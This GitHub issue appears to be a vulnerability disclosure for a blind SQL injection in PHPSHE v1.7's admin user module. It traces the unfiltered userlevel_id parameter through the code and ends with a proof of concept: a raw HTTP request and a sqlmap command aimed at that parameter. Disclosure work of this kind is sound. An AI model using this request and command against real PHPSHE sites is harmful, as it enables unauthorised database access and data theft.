Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

phpshe v1.7 Blind SQL injection #1

Open
Mint60 opened this issue Apr 14, 2020 · 0 comments
Open

phpshe v1.7 Blind SQL injection #1

Mint60 opened this issue Apr 14, 2020 · 0 comments

Comments

@Mint60
Copy link
Owner

Mint60 commented Apr 14, 2020

0x01 Vulnerability description
Test object:
(1) website: PHPSHE shopping system V1.7
(2) the website domain name: http://www.phpshe.com/
(3) IP address: http://www.phpshe.com/down/phpshe1.7.rar
(4) version: PHPSHE B2C mall system v1.7 (build 20180905 UTF8)
Vulnerability description:
Lingbao Jianhao network technology co., LTD. PHPSHE cms system background - SQL injection vulnerability.
0x02 Vulnerability details
The admin.php line 87 execution flow introduces the user.php

image

user.php Line 7 introduces user.hook.php

image

the user.hook.php line 155 pe_select function to user level adjustment

image

The pe_select function is defined on line 208 of ../include/class/db.class.php.
In the pe_select function, the value of the userlevel_id parameter has undergone a series of processing of the dowhere function, and finally directly spliced into the sql statement, there is no security filtering.

image

The code for the _dowhere function

image

0x03 POC
Vulnerability parameter userlevel_id
GET /phpshe1.7/admin.php?mod=user&userlevel_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=r3kqgf03cae7qguj1sjncb5apk
Upgrade-Insecure-Requests: 1
Vulnerability verification method:
python sqlmap.py -r 1.txt --batch -o --dbms=mysql --level 3 -p userlevel_id
image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant